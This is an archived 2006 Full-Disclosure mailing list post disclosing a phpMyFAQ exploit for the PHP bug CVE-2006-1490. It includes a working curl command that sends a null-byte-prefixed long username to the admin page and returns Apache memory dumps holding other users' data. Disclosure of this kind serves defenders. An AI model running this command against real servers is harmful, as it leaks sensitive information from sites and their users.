lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 1 Dec 2006 16:57:41 +0200
From: Tonu Samuel <tonu@....ee>
To: full-disclosure@...ts.grok.org.uk
Subject: phpmyfaq exploit using PHP bug, CVE-2006-1490

Long time ago I made unneccesary noise about PHP zeroday. I expected it to be 
maybe much more dangerous that it appeared to be at end. There was lot of 
disscussions and one of main consensus was that this bug is not exploitable 
in real world because noone is using those vulnerable functions.

This bug was originally found using phpmyfaq software and wrong assumption was 
made about wideness of problem. Anyway now half year later it is time to show 
exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d 
"faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

Longer input you provide, longer memory dump you get. Works if PHP is 
unpatched AND phpmyfaq is older than 1.6.0. Memory dump you get is part of 
apache memory and often contains sensitive information from other served 
pages and contexts.

To make it clear - this is NOT fault of phpmyfaq people at all. Even more, 
they made workaround within an hour after I contacted them and urged users to 
upgrade. Just phpmyfaq appears to be one popular software which is easily 
findable by Google and this was the software where initially discovery was 
made. PHP people knew about problem but ignored for long enough to discover 
it independently from them.

   T├Ánu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists